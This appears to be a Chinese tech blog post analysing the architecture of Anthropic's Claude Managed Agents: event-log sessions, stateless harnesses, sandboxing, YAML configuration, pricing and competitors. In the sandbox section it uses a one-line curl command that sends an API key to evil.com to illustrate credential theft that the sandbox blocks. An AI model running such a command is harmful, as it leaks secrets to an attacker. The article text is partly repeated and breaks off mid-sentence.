1. 这不是新赛道是 runtime 层的“操作系统时刻”来了你有没有在深夜调试一个跑了三小时的 AI agent眼睁睁看着它在第 187 步突然开始胡言乱语而你翻遍日志只看到一行模糊的context_length_exceeded或者更糟——它没报错只是 quietly hallucinated把上一步从数据库查出的客户邮箱替换成自己编造的、格式完全正确但根本不存在的地址等你发现时300 封营销邮件已经发了出去。这不是虚构场景这是我去年在给一家保险科技公司做智能理赔助手时的真实事故。我们当时把所有 session state 塞进 Claude 的上下文窗口里以为靠 prompt engineering 和 careful truncation 就能撑住。结果呢它像一根被反复弯折的回形针在某个临界点无声断裂。没有崩溃日志没有可回溯的执行链只有业务数据在静默中被污染。Anthropic 在 4 月 8 日发布的Claude Managed Agents表面看是一次常规的产品更新支持 Notion、Asana 集成有 sandboxed executioncheckpointed sessionscredential vaulting。媒体通稿里满是“十倍提速”、“下一代智能体架构”这类词。但如果你真去读他们那篇工程博客会发现一个被刻意轻描淡写的、却重如千钧的底层设计Session as durable event log。这句话不是修辞是手术刀。它意味着那个曾经被塞进模型上下文、随 token 流动而飘忽不定的“状态”现在被抽离出来变成一个独立、持久、可查询、可审计、可重放的事件流稳稳地躺在 Anthropic 的存储层里。Harness执行器本身成了无状态的“快递员”只负责根据事件日志里的最新指令调用工具、返回结果然后把新事件写回日志。它挂了没关系awake(sessionId)一声令下新的 Harness 就能从日志里精准续上断点就像你关掉电脑再开机文档还在上次光标停留的位置。这背后解决的是所有严肃 agent 应用都无法绕开的“上下文诅咒”。Claude 3.5 Sonnet 的上下文窗口是 200K tokens听起来很大。但别忘了一个典型的多步骤任务比如“分析客户投诉邮件 → 查询 CRM 获取历史记录 → 调用知识库检索政策条款 → 生成合规回复草稿 → 根据法务反馈修改 → 发送最终邮件”每一步的 tool call 输入/输出、中间思考链、系统提示、历史对话摘要……这些加起来轻轻松松就吃掉 80% 以上的窗口。而 Anthropic 的方案直接把“状态”这个最占地方、最易失、最不可控的变量从模型的“内存”里搬到了“硬盘”上。这不仅是工程优化更是范式迁移——它让 agent 从一个依赖于单次推理上下文的“瞬时函数”变成了一个拥有自己生命周期、自己记忆、自己身份的“长期服务”。关键词Towards AI - Medium所代表的正是这种深度技术解读的土壤。它不满足于告诉你“Anthropic 发布了什么”而是要剖开它的肌理告诉你“为什么这个设计是必然的以及它如何重塑整个 AI 工程师的日常”。它面向的不是只想尝鲜的爱好者而是那些正在生产环境里为一个 agent 的稳定性、可审计性、可扩展性掉头发的工程师、架构师和产品负责人。他们需要的不是概念是能立刻拿去改自己代码的思路是能预判未来半年技术选型风险的判断依据。所以这篇文章的起点就是那个凌晨三点、盯着监控面板上一条诡异的p95 latency spike的你。我们接下来要聊的就是如何让你下次再也不用熬那个夜。2. 核心设计解构为什么是“事件日志”而不是“状态快照”2.1 “Session as Event Log” 的底层逻辑与不可替代性很多团队在遭遇 context overflow 后第一反应是“升级模型”换一个上下文更大的版本。这就像房子漏水不去修屋顶而是去买个更大的桶来接水。Managed Agents 的核心洞见在于问题从来不在“桶”的大小而在于“水”的流向和存储方式。把 session state 当作一个静态的“快照”snapshot来保存是传统做法。每次 checkpoint就把当前所有变量、历史对话、工具返回结果序列化成一个巨大的 JSON blob 存起来。下次恢复时再把这个 blob 全部加载进内存塞回模型上下文。这看似简单实则埋下了三颗定时炸弹爆炸性增长一个简单的客服对话10 轮交互后快照可能就达到 50KB。如果这个 agent 还要调用 5 次 API每次返回一个 2KB 的 JSON快照体积会指数级膨胀。当它运行到第 500 轮时光是加载和反序列化这个快照就可能耗尽内存或触发超时。一致性灾难快照是“全有或全无”的。如果在保存快照的瞬间agent 正在并发调用两个工具比如同时查订单和查库存而其中一个成功、一个失败快照里存下的就是一个逻辑上自相矛盾的状态。恢复后agent 会基于这个错误前提继续推理错误被固化。审计黑洞快照只告诉你“此刻是什么样子”却不告诉你“它是怎么变成这样的”。你无法回答“用户是在哪一步第一次提到‘退款’这个词的”、“法务审核的反馈是在第几次 tool call 后被采纳的”——因为所有信息都混在了一个大 blob 里没有时间戳没有因果链。Anthropic 选择的“事件日志”Event Log模式彻底规避了以上所有问题。它的本质是将 agent 的每一次关键动作都记录为一条结构化的、带时间戳的、不可变的事件Immutable Event。一个典型的事件流长这样[ { eventId: evt_abc123, timestamp: 2026-04-08T14:22:18.456Z, type: USER_MESSAGE, payload: { content: 我的订单 #ORD-7890 一直没发货请帮我查一下。 } }, { eventId: evt_def456, timestamp: 2026-04-08T14:22:19.123Z, type: MODEL_THINKING, payload: { thought: 需要先查询订单状态提取订单号 ORD-7890。 } }, { eventId: evt_ghi789, timestamp: 2026-04-08T14:22:20.789Z, type: TOOL_CALL, payload: { toolName: get_order_status, input: {order_id: ORD-7890} } }, { eventId: evt_jkl012, timestamp: 2026-04-08T14:22:25.345Z, type: TOOL_RESULT, payload: { toolName: get_order_status, result: {status: shipped, tracking_number: UPS-123456789} } } ]提示这种设计的威力在于它天然支持“时间旅行式调试”。你可以精确地replay_from_event(evt_ghi789)让 agent 从调用get_order_status的那一刻开始重新执行完全复现当时的环境和输入而无需担心其他无关的历史干扰。这是快照模式永远无法提供的能力。2.2 Harness无状态执行器的“极简主义”哲学如果说 Session 是 agent 的“大脑记忆”那么 Harness 就是它的“肌肉和神经”。Managed Agents 的 Harness 设计贯彻了一种近乎偏执的“无状态”Stateless哲学。它的核心接口只有一个execute(name, input) - string。你告诉它要调用哪个工具name传入什么参数input它就去沙箱里跑然后把结果字符串string吐回来。它不关心这个工具调用是第几步不记得上一次的结果甚至不知道自己正在处理的是哪个用户的 session。它的全部职责就是完成这一次“请求-响应”的原子操作。这种设计的好处是颠覆性的。首先可伸缩性Scalability变得极其简单。当你的 agent 突然涌入 1000 个并发请求时你不需要去扩容一个庞大的、状态复杂的“agent 实例集群”。你只需要水平扩展一堆轻量级的 Harness 实例。每个实例都是“用完即弃”的处理完一个请求就释放资源等待下一个。这就像餐厅里的服务员他们不负责记住所有客人的菜单只负责把厨房做好的菜端上桌。其次容错性Fault Tolerance得到质的飞跃。如果一个 Harness 在执行send_email工具时因为网络抖动而崩溃系统不会丢失任何东西。因为崩溃前它已经把TOOL_CALL事件写入了日志崩溃后一个新的 Harness 会被唤醒读取日志发现最后一条未完成的事件是send_email于是它会重试这个调用。整个过程对用户完全透明session 的连续性毫发无损。注意这种无状态性也意味着开发者必须放弃一种惯性思维——试图在 Harness 的内存里缓存一些“临时变量”来加速计算。所有需要跨步骤共享的信息都必须通过写入事件日志来实现。这是一种约束但正是这种约束保证了系统的健壮和可预测。2.3 Sandbox从“宠物”到“牲畜”的基础设施革命“Sandboxed execution” 这个词在技术文章里被提了无数次但很少有人深究它背后的基础设施哲学。Anthropic 的沙箱完美践行了云计算时代最经典的信条Cattle, not Pets牲畜而非宠物。传统上我们为一个 agent 创建的执行环境往往是一个精心配置、打上标签、赋予名字、定期维护的“虚拟机”或“容器”。它像一只宠物我们给它起名、喂食、看病。一旦它生病比如被恶意 tool call 注入了 payload我们就得花大力气去抢救、隔离、消毒。Managed Agents 的沙箱则是彻头彻尾的“牲畜”。当你发起一个execute(analyze_pdf, {...})请求时系统会在毫秒级内动态拉起一个全新的、干净的、只包含必要依赖的 Linux 容器。这个容器的生命周期严格绑定于这一次 tool call。它启动、执行、返回结果、然后被立即销毁。它的文件系统是只读的除了/tmp目录外没有任何写入权限。它无法访问网络除非你明确在 YAML 配置中为其授予了特定的allowed_hosts。最关键的是它永远看不到任何 credentials。所有的密钥、token、API keys都由 Anthropic 的 Vault 服务在沙箱内部进行安全注入且注入的时机是在沙箱启动之后、tool code 执行之前并且注入的凭证是经过短期时效签名的过期即失效。这种设计带来的安全收益是几何级的。想象一下一个 agent 被诱导执行了curl https://evil.com?token${API_KEY}。在传统模式下如果API_KEY是作为环境变量注入的那么这条命令就能成功窃取密钥。而在 Managed Agents 的沙箱里API_KEY根本不会以明文形式存在于环境变量中它只在 tool code 内部、在需要调用 API 的那一行代码里才被 Vault 动态解密并使用用完即焚。这从根本上堵死了 credential leakage 这条最危险的攻击路径。它不是靠“防火墙”来防御而是靠“基因编辑”让沙箱从出生起就不具备泄露密钥的生理结构。3. 实操落地从 YAML 配置到生产环境的完整闭环3.1 定义你的第一个 AgentYAML 是新的编程语言在 Managed Agents 的世界里你不再需要写几百行 Python 代码来初始化一个 LangChain chain。定义一个 agent 的全部浓缩在一份清晰、声明式的 YAML 文件里。这并非偷懒而是将“意图”Intent与“实现”Implementation彻底分离。你告诉 Anthropic “我要做什么”而不是“我该怎么一步步做”。以下是一个为销售团队构建的“线索评分 agent”的完整 YAML 示例# sales-lead-scorer.yaml name: Sales Lead Scorer description: Scores inbound leads based on firmographic data and engagement history. system_prompt: | You are a senior sales operations analyst at Acme Corp. Your job is to score leads on a scale of 1-100. Use the following criteria: - Company size (10 points): 1000 employees 10, 500-999 7, 500 3 - Industry (15 points): Tech, Finance, Healthcare 15, Others 5 - Website traffic (20 points): 50k/mo 20, 10k-50k 15, 10k 5 - Email open rate (25 points): 40% 25, 20-40% 15, 20% 5 - Meeting booked (30 points): Yes 30, No 0 Always output ONLY a JSON object with score and reason fields. tools: - name: get_company_info description: Fetches company size, industry, and website traffic from Clearbit API. input_schema: type: object properties: domain: type: string description: The companys website domain. allowed_hosts: [api.clearbit.com] timeout_ms: 5000 - name: get_engagement_data description: Fetches email open rate and meeting status from HubSpot CRM. input_schema: type: object properties: contact_id: type: string description: The HubSpot contact ID. allowed_hosts: [api.hubspot.com] timeout_ms: 8000 guardrails: - type: output_format schema: type: object properties: score: type: integer minimum: 1 maximum: 100 reason: type: string required: [score, reason] - type: pii_redaction patterns: - email - phone - ssn - type: content_moderation severity_threshold: high这份 YAML 的力量在于它将所有关键决策都显式化了。system_prompt不再是藏在代码注释里的模糊要求而是 agent 行为的宪法。tools的input_schema强制了类型安全避免了因传入错误参数导致的 tool call 失败。guardrails则像一套内置的合规引擎自动过滤 PII 信息、强制输出格式、拦截有害内容。当你把这份 YAML 提交给 Anthropic你就完成了一次“契约式编程”Contract-based Programming。你承诺了输入的格式Anthropic 承诺了输出的格式和行为边界。这极大地降低了协作成本和线上故障率。3.2 会话管理awake()与pause()的艺术在 Managed Agents 中“启动一个 agent”这个动作消失了。取而代之的是awake(sessionId)和pause(sessionId)这两个核心 API。这反映了其设计理念的根本转变agent 不是一个需要被“启动”的进程而是一个随时待命的、有状态的服务。awake()的调用本质上是向系统发出一个信号“请为这个 sessionId 准备好一个 Harness并让它从事件日志的最新位置开始工作。” 它的响应体里会包含一个sessionId和一个next_action字段告诉你下一步该做什么。一个典型的、与 Slack 集成的销售线索处理流程如下触发Slack bot 收到一条新消息sales-bot score lead for acme.com。唤醒Bot 后端调用POST /v1/sessions/awake传入{user_id: U123, initial_input: acme.com}。系统返回{session_id: sess_xyz789, next_action: TOOL_CALL, tool_name: get_company_info, tool_input: {domain: acme.com}}。执行Bot 后端解析next_action调用execute(get_company_info, {domain: acme.com})。循环Harness 执行完毕将TOOL_RESULT事件写入日志并返回新的next_action。Bot 后端持续轮询或监听 webhook直到next_action变为COMPLETE此时它会从日志中读取最终的OUTPUT事件将score和reason发送给 Slack 用户。实操心得pause()的使用时机是区分业余和专业玩家的关键。不要等到 agent 把所有事情都做完才pause()。你应该在每一个关键决策点之后主动pause()。例如在get_company_info返回结果后pause()在get_engagement_data返回后pause()。这样做的好处是如果用户中途想修改需求比如“等等先别查 HubSpot先看看他们的 LinkedIn 页面”你可以直接awake()并注入一个新的USER_MESSAGE事件覆盖掉原本的执行路径。这实现了真正的“人机协同”而不是“机器单干人只能等结果”。3.3 定价模型$0.08/小时背后的精算逻辑Managed Agents 的定价是$0.08 per session-hour of active runtime外加标准的 Claude token 费用。乍看之下这似乎比自己租用 EC2 实例便宜不了多少。但这里的“session-hour”是一个极具迷惑性的概念它的真实含义是agent 在 Harness 上实际执行代码所消耗的 CPU 时间总和。它不计算等待 I/O比如 API 调用响应的时间不计算事件日志写入的时间不计算模型推理的时间那是 token 费用的范畴。我们来做一个真实测算。假设你的销售线索评分 agent平均一次完整的评分流程需要1 次get_company_infotool call平均耗时 1200ms1 次get_engagement_datatool call平均耗时 2500ms模型自身的思考和格式化输出约 800ms计入 token 费用那么这次 session 的active runtime就是1.2 2.5 3.7 秒。按 $0.08/小时换算每秒成本是$0.08 / 3600 ≈ $0.0000222。3.7 秒的成本约为$0.000082也就是不到一美分的八分之一。这意味着即使你的 agent 每天处理 10,000 条线索其 runtime 成本也仅为$0.82完全可以忽略不计。这个定价模型的精妙之处在于它将成本与你的 agent 的工程效率直接挂钩。如果你的get_company_infotool 因为没有设置合理的timeout_ms导致在 Clearbit API 响应慢时卡住 30 秒那么这 30 秒就会被计入active runtime成本飙升。这倒逼你必须写出高效、健壮、有兜底的 tool code。它不是一个“包年包月”的懒政式收费而是一个“用多少付多少”的精益生产计费。对于那些已经将 tool code 优化到极致的团队Managed Agents 的 runtime 成本几乎可以视为零。4. 生产级挑战与避坑指南那些文档里不会写的血泪教训4.1 事件日志的“双刃剑”查询性能与成本陷阱事件日志的持久化和可查询性是 Managed Agents 的王牌。但当你开始在生产环境中大规模使用时一个隐藏的陷阱会浮现日志查询的性能和成本会随着 session 的生命周期呈非线性增长。Anthropic 提供的GET /v1/sessions/{id}/eventsAPI虽然强大但它默认只返回最近的 100 条事件。如果你想获取一个运行了 72 小时、产生了 5000 条事件的 session 的完整日志你需要分页调用而每一次调用都会产生一次 API 请求费用和延迟。我们曾在一个金融风控 agent 上踩过这个坑。该 agent 需要对每一笔交易进行长达 20 分钟的多步分析期间会产生数百条事件。当审计团队需要回溯某一笔可疑交易的完整决策链时我们的后台服务需要发起数十次 API 调用耗时超过 15 秒用户体验极差。最终的解决方案是引入一个“日志归档”策略在 sessionCOMPLETE后立即调用GET /v1/sessions/{id}/events?limit10000获取全量日志并将其压缩、加密后存入我们自己的 S3 仓库。后续的所有审计查询都直接从 S3 进行毫秒级响应。这额外增加了一小段代码却将审计延迟从 15 秒降到了 200 毫秒。注意这个策略也带来了另一个权衡——数据一致性。S3 中的日志是COMPLETE时刻的快照。如果 session 因为某种原因被resume并继续执行S3 中的日志就不会更新。因此我们的归档逻辑里加入了对session.status的实时监听一旦状态变为RESUMED就自动删除旧的归档触发新的归档流程。4.2 沙箱的“幽灵依赖”本地开发与云端执行的鸿沟在本地用docker run测试你的 tool code 时一切顺利。但一旦部署到 Managed Agents 的沙箱里import pandas就报ModuleNotFoundError。这不是 bug而是 Managed Agents 沙箱的“纯净主义”原则在作祟。它默认只提供最精简的 Python 运行时Python 3.11不预装任何第三方库。你必须在 YAML 的tools定义中显式声明每一个 tool 所需的依赖。正确的做法是在tools下添加requirements字段- name: analyze_financial_report description: Uses pandas and numpy to calculate financial ratios. input_schema: { ... } requirements: - pandas2.2.2 - numpy1.26.4 # ... 其他配置这个字段的作用是告诉 Anthropic 的构建系统在为这个 tool 创建沙箱镜像时自动运行pip install pandas2.2.2 numpy1.26.4。这里有两个极易被忽视的细节版本锁定必须指定精确版本号不能用或~。因为沙箱的构建是确定性的不同版本的 pandas 可能有细微的行为差异导致本地测试通过云端执行失败。依赖树爆炸pandas会自动安装numpy但如果你在requirements里同时写了pandas2.2.2和numpy1.26.4而这两个版本不兼容构建就会失败。最佳实践是只写你直接 import 的包让 pip 自动解析其依赖树。4.3 Guardrails 的“过度保护”如何让 AI 说人话guardrails是一把锋利的双刃剑。output_formatguardrail 能确保你的 agent 总是输出 JSON这很棒。但content_moderationguardrail 的severity_threshold: high却可能在关键时刻“封印”你的 agent。我们曾为一个医疗问答 agent 设置了此规则结果发现当用户问“我父亲有高血压能吃阿司匹林吗”agent 的回复中包含了“阿司匹林”和“高血压”这两个高风险词被content_moderation拦截返回了通用的“我无法回答此问题”。这显然违背了产品的初衷。解决方案是采用“分层防护”策略对于output_format和pii_redaction保持全局启用。对于content_moderation改为severity_threshold: medium并配合一个自定义的allowlist将医学术语如aspirin,hypertension,insulin加入白名单。YAML 中可以这样写- type: content_moderation severity_threshold: medium allowlist: - aspirin - hypertension - diabetes - insulin这样agent 就能在合规的前提下说出真正有用的专业信息。Guardrails 不是越严越好而是要像外科医生的手术刀精准地切掉病灶而不伤及健康组织。5. 竞争格局与未来演进为什么 runtime 层注定走向“零价”5.1 Hyperscaler 的碾压式入场AWS AgentCore 的启示Anthropic 的 Managed Agents 发布新闻稿里通篇没有提及一个名字Amazon Bedrock AgentCore。但这恰恰是整篇文章最核心的背景音。AgentCore 在 2025 年底就已进入 GAGeneral Availability到 2026 年 3 月其 SDK 下载量已突破两百万次。它的架构与 Managed Agents 高度相似session 作为事件日志、harness 无状态、microVM 沙箱。但它有一个 Managed Agents 永远无法企及的优势它免费。AWS 的商业模式从来不是靠卖 runtime 来赚钱。它的目标是让你的整个 AI 应用栈都运行在 AWS 的基础设施之上。当你在 AgentCore 上运行一个 Claude agent 时你支付的是 EC2 实例的费用、S3 存储的费用、CloudWatch 日志的费用以及最关键的——Bedrock 的 Claude token 费用。AgentCore 本身只是一个免费的、高度集成的“胶水层”。这就像当年 VMware 卖 ESX 时AWS 说“我们不卖 hypervisor我们卖的是整个数据中心。你用我们的 EC2hypervisor 就是免费的。”这个事实决定了 Managed Agents 的战略定位。它不是一个要“赢”得 runtime 市场的进攻性产品而是一个防御性的“客户留存工具”。它的存在是为了回答那个尖锐的问题“如果我不提供托管 runtime我的 Claude token 客户会不会轻易地把他们的 agent 迁移到 AWS 上然后在 AgentCore 里无缝地切换到 Llama 3 或 Gemini Pro仅仅因为它们更便宜” Managed Agents 的答案是“不会。因为迁移到 AWS意味着你要重写 YAML重构 tool code重新配置 guardrails还要承担 AWS 的 vendor lock-in。而留在 Anthropic你只需点击几下就能获得一个同样强大、且与 Claude 深度优化的 runtime。”5.2 开源压力曲线Daytona 与 Kubernetes SIG 的“平价替代”如果说 hyperscaler 是从“价格”上施压那么开源社区则是从“创新速度”和“定制自由度”上发起挑战。2025 年初Daytona 项目宣布转型从一个 DevOps 环境工具全面进军 AI agent infrastructure。它在 2026 年 2 月完成的 2400 万美元 A 轮融资其核心卖点就是“sub-90ms sandbox spin-up times”。这个数字比 Anthropic 宣称的“p50 time-to-first-token down roughly 60%”更具象、更可衡量。更值得警惕的是 Kubernetes SIGSpecial Interest Group的动作。他们在 2026 年初正式将kubernetes-sigs/ai-agent-sandbox项目纳入官方孵化计划。这意味着未来任何一个 K8s 集群都可以通过一个简单的kubectl apply -f agent-sandbox.yaml就原生获得一个符合 CNCFCloud Native Computing Foundation标准的、可插拔的 agent 沙箱。它的优势在于无与伦比的可移植性你的 agent YAML今天可以在 Anthropic 上跑明天就可以一键部署到你自己的 K8s 集群后天还能跑到 GCP 的 GKE 上。这种“write once, run anywhere”的愿景是对所有闭源托管 runtime 的终极降维打击。实操心得面对这种开源浪潮最愚蠢的策略是“闭门造车”。最聪明的做法是拥抱它。我们团队的策略是将所有核心的 business logic都封装在符合 OpenAPI 规范的、独立的微服务中如sales-scoring-service。Managed Agents 的 YAML只负责 orchestrate编排这些服务。这样当某一天 Daytona 的性能真的超越了 Anthropic我们只需修改 YAML 中的toolURL指向我们自己的 K8s 服务整个 agent 的行为逻辑毫发无损。Runtime 是可替换的但你的业务价值永远沉淀在你的 service 里。5.3 价值迁移的三大高地Trace Store、Governance、Vertical Marketplace当 runtime 层不可避免地滑向“零价”时整个 AI 工程的价值重心将剧烈地向上迁移。这场迁移已经在三个方向上清晰可见第一Trace Store追踪存储谁拥有了 agent 所有行为的、权威的、不可篡改的“真相之源”谁就拥有了下一阶段的入口。Braintrust 的 Brainstore、Arize 的 Phoenix、LangSmith它们的竞争焦点早已不是谁的 UI 更漂亮而是谁能提供最强的“trace portability”。一个企业客户会问“如果我今天用 Anthropic明天迁移到 AgentCore我过去三年的 10 亿条 agent 交互日志能不能一键导入你们的系统继续做分析” 这个问题的答案将决定 Trace Store 的生死。第二Governance Policy治理与策略当 agent 开始自主调用银行 API、修改 CRM 数据、甚至生成法律合同企业采购部门的首要问题不再是“它快不快”而是“它准不准”、“它合不合规”、“出了事谁负责”。AWS AgentCore 在 2026 年 3 月 GA 的 Policy Controls就是对这一需求的直接回应。它允许你定义“这个 agent 只能调用get_customer_data不能调用delete_customer_data”“所有send_email的内容必须经过法务部门的email_approvaltool 审批后才能发送”。这是一个全新的、价值巨大的软件品类它不卖 compute它卖的是“可控性”。第三Vertical Marketplace垂直领域市场Salesforce 的 Agentforce ARR 达到 8 亿美元这个数字说明了一切。企业愿意为一个能解决“销售线索评分”、“财务报表分析”、“网络安全渗透测试”这些具体问题的 agent 付费但绝不愿意为一个通用的、需要自己配置的 runtime 付费。未来的赢家将是那些深耕某个垂直领域将行业知识、最佳实践、合规要求全部打包进一个开箱即用的 agent 里的公司。它们的商业模式将从“卖软件”转向“卖结果”——按每成功转化一个销售线索收费按每份生成的合规财报收费按每次发现的安全漏洞收费。6. 我的实战体会从“runtime 焦虑”到“价值聚焦”在我亲手把公司的核心客服 agent从自建的 LangChain FastAPI 架构迁移到 Anthropic Managed Agents 的这三个月里最大的感受不是技术上的兴奋而是一种前所未有的“解脱感”。那种每天早上打开 Grafana第一件事就是检查context_overflow_rate和sandbox_crash_count的焦虑消失了。取而代之的是我可以把全部精力投入到真正创造价值的地方和产品经理一起重新梳理客服 SOP把那些过去只能靠人工经验判断的“客户情绪等级”、“问题紧急程度”翻译成精确的system_prompt和guardrails和法务团队合作为send_refund_email这个 tool设计一套嵌入式的、基于规则的审批流确保每一笔退款都符合最新的监管要求。Managed Agents 没有让我成为一个更“酷”的工程师但它让我成为一个更“有效”的工程师。它把那些曾经吞噬我 70% 时间的、与业务无关的基础设施难题scaling, observability, security hardening打包成一个可靠的服务。它让我终于可以回答那个困扰了我多年的问题“我的代码到底在为客户解决什么问题” 而不是“我的代码到底在和哪个沙箱的 cgroup 配置做斗争”所以如果你也在评估是否要采用 Managed Agents我的建议很直接不要把它当作一个“要不要买 runtime”的技术选型问题。把它当作一个“要不要把你的团队从基础设施的泥潭里解放出来去专注打磨核心业务逻辑”的战略决策。它的价值不在于它比你自己搭建的 runtime 快了多少毫秒而在于它让你的下一次产品迭代提前了两周上线。而这两周就是你与竞争对手之间最真实的护城河。
AI Agent Runtime 范式革命:事件日志驱动的持久化会话架构
发布时间:2026/5/22 15:16:26
1. 这不是新赛道是 runtime 层的“操作系统时刻”来了你有没有在深夜调试一个跑了三小时的 AI agent眼睁睁看着它在第 187 步突然开始胡言乱语而你翻遍日志只看到一行模糊的context_length_exceeded或者更糟——它没报错只是 quietly hallucinated把上一步从数据库查出的客户邮箱替换成自己编造的、格式完全正确但根本不存在的地址等你发现时300 封营销邮件已经发了出去。这不是虚构场景这是我去年在给一家保险科技公司做智能理赔助手时的真实事故。我们当时把所有 session state 塞进 Claude 的上下文窗口里以为靠 prompt engineering 和 careful truncation 就能撑住。结果呢它像一根被反复弯折的回形针在某个临界点无声断裂。没有崩溃日志没有可回溯的执行链只有业务数据在静默中被污染。Anthropic 在 4 月 8 日发布的Claude Managed Agents表面看是一次常规的产品更新支持 Notion、Asana 集成有 sandboxed executioncheckpointed sessionscredential vaulting。媒体通稿里满是“十倍提速”、“下一代智能体架构”这类词。但如果你真去读他们那篇工程博客会发现一个被刻意轻描淡写的、却重如千钧的底层设计Session as durable event log。这句话不是修辞是手术刀。它意味着那个曾经被塞进模型上下文、随 token 流动而飘忽不定的“状态”现在被抽离出来变成一个独立、持久、可查询、可审计、可重放的事件流稳稳地躺在 Anthropic 的存储层里。Harness执行器本身成了无状态的“快递员”只负责根据事件日志里的最新指令调用工具、返回结果然后把新事件写回日志。它挂了没关系awake(sessionId)一声令下新的 Harness 就能从日志里精准续上断点就像你关掉电脑再开机文档还在上次光标停留的位置。这背后解决的是所有严肃 agent 应用都无法绕开的“上下文诅咒”。Claude 3.5 Sonnet 的上下文窗口是 200K tokens听起来很大。但别忘了一个典型的多步骤任务比如“分析客户投诉邮件 → 查询 CRM 获取历史记录 → 调用知识库检索政策条款 → 生成合规回复草稿 → 根据法务反馈修改 → 发送最终邮件”每一步的 tool call 输入/输出、中间思考链、系统提示、历史对话摘要……这些加起来轻轻松松就吃掉 80% 以上的窗口。而 Anthropic 的方案直接把“状态”这个最占地方、最易失、最不可控的变量从模型的“内存”里搬到了“硬盘”上。这不仅是工程优化更是范式迁移——它让 agent 从一个依赖于单次推理上下文的“瞬时函数”变成了一个拥有自己生命周期、自己记忆、自己身份的“长期服务”。关键词Towards AI - Medium所代表的正是这种深度技术解读的土壤。它不满足于告诉你“Anthropic 发布了什么”而是要剖开它的肌理告诉你“为什么这个设计是必然的以及它如何重塑整个 AI 工程师的日常”。它面向的不是只想尝鲜的爱好者而是那些正在生产环境里为一个 agent 的稳定性、可审计性、可扩展性掉头发的工程师、架构师和产品负责人。他们需要的不是概念是能立刻拿去改自己代码的思路是能预判未来半年技术选型风险的判断依据。所以这篇文章的起点就是那个凌晨三点、盯着监控面板上一条诡异的p95 latency spike的你。我们接下来要聊的就是如何让你下次再也不用熬那个夜。2. 核心设计解构为什么是“事件日志”而不是“状态快照”2.1 “Session as Event Log” 的底层逻辑与不可替代性很多团队在遭遇 context overflow 后第一反应是“升级模型”换一个上下文更大的版本。这就像房子漏水不去修屋顶而是去买个更大的桶来接水。Managed Agents 的核心洞见在于问题从来不在“桶”的大小而在于“水”的流向和存储方式。把 session state 当作一个静态的“快照”snapshot来保存是传统做法。每次 checkpoint就把当前所有变量、历史对话、工具返回结果序列化成一个巨大的 JSON blob 存起来。下次恢复时再把这个 blob 全部加载进内存塞回模型上下文。这看似简单实则埋下了三颗定时炸弹爆炸性增长一个简单的客服对话10 轮交互后快照可能就达到 50KB。如果这个 agent 还要调用 5 次 API每次返回一个 2KB 的 JSON快照体积会指数级膨胀。当它运行到第 500 轮时光是加载和反序列化这个快照就可能耗尽内存或触发超时。一致性灾难快照是“全有或全无”的。如果在保存快照的瞬间agent 正在并发调用两个工具比如同时查订单和查库存而其中一个成功、一个失败快照里存下的就是一个逻辑上自相矛盾的状态。恢复后agent 会基于这个错误前提继续推理错误被固化。审计黑洞快照只告诉你“此刻是什么样子”却不告诉你“它是怎么变成这样的”。你无法回答“用户是在哪一步第一次提到‘退款’这个词的”、“法务审核的反馈是在第几次 tool call 后被采纳的”——因为所有信息都混在了一个大 blob 里没有时间戳没有因果链。Anthropic 选择的“事件日志”Event Log模式彻底规避了以上所有问题。它的本质是将 agent 的每一次关键动作都记录为一条结构化的、带时间戳的、不可变的事件Immutable Event。一个典型的事件流长这样[ { eventId: evt_abc123, timestamp: 2026-04-08T14:22:18.456Z, type: USER_MESSAGE, payload: { content: 我的订单 #ORD-7890 一直没发货请帮我查一下。 } }, { eventId: evt_def456, timestamp: 2026-04-08T14:22:19.123Z, type: MODEL_THINKING, payload: { thought: 需要先查询订单状态提取订单号 ORD-7890。 } }, { eventId: evt_ghi789, timestamp: 2026-04-08T14:22:20.789Z, type: TOOL_CALL, payload: { toolName: get_order_status, input: {order_id: ORD-7890} } }, { eventId: evt_jkl012, timestamp: 2026-04-08T14:22:25.345Z, type: TOOL_RESULT, payload: { toolName: get_order_status, result: {status: shipped, tracking_number: UPS-123456789} } } ]提示这种设计的威力在于它天然支持“时间旅行式调试”。你可以精确地replay_from_event(evt_ghi789)让 agent 从调用get_order_status的那一刻开始重新执行完全复现当时的环境和输入而无需担心其他无关的历史干扰。这是快照模式永远无法提供的能力。2.2 Harness无状态执行器的“极简主义”哲学如果说 Session 是 agent 的“大脑记忆”那么 Harness 就是它的“肌肉和神经”。Managed Agents 的 Harness 设计贯彻了一种近乎偏执的“无状态”Stateless哲学。它的核心接口只有一个execute(name, input) - string。你告诉它要调用哪个工具name传入什么参数input它就去沙箱里跑然后把结果字符串string吐回来。它不关心这个工具调用是第几步不记得上一次的结果甚至不知道自己正在处理的是哪个用户的 session。它的全部职责就是完成这一次“请求-响应”的原子操作。这种设计的好处是颠覆性的。首先可伸缩性Scalability变得极其简单。当你的 agent 突然涌入 1000 个并发请求时你不需要去扩容一个庞大的、状态复杂的“agent 实例集群”。你只需要水平扩展一堆轻量级的 Harness 实例。每个实例都是“用完即弃”的处理完一个请求就释放资源等待下一个。这就像餐厅里的服务员他们不负责记住所有客人的菜单只负责把厨房做好的菜端上桌。其次容错性Fault Tolerance得到质的飞跃。如果一个 Harness 在执行send_email工具时因为网络抖动而崩溃系统不会丢失任何东西。因为崩溃前它已经把TOOL_CALL事件写入了日志崩溃后一个新的 Harness 会被唤醒读取日志发现最后一条未完成的事件是send_email于是它会重试这个调用。整个过程对用户完全透明session 的连续性毫发无损。注意这种无状态性也意味着开发者必须放弃一种惯性思维——试图在 Harness 的内存里缓存一些“临时变量”来加速计算。所有需要跨步骤共享的信息都必须通过写入事件日志来实现。这是一种约束但正是这种约束保证了系统的健壮和可预测。2.3 Sandbox从“宠物”到“牲畜”的基础设施革命“Sandboxed execution” 这个词在技术文章里被提了无数次但很少有人深究它背后的基础设施哲学。Anthropic 的沙箱完美践行了云计算时代最经典的信条Cattle, not Pets牲畜而非宠物。传统上我们为一个 agent 创建的执行环境往往是一个精心配置、打上标签、赋予名字、定期维护的“虚拟机”或“容器”。它像一只宠物我们给它起名、喂食、看病。一旦它生病比如被恶意 tool call 注入了 payload我们就得花大力气去抢救、隔离、消毒。Managed Agents 的沙箱则是彻头彻尾的“牲畜”。当你发起一个execute(analyze_pdf, {...})请求时系统会在毫秒级内动态拉起一个全新的、干净的、只包含必要依赖的 Linux 容器。这个容器的生命周期严格绑定于这一次 tool call。它启动、执行、返回结果、然后被立即销毁。它的文件系统是只读的除了/tmp目录外没有任何写入权限。它无法访问网络除非你明确在 YAML 配置中为其授予了特定的allowed_hosts。最关键的是它永远看不到任何 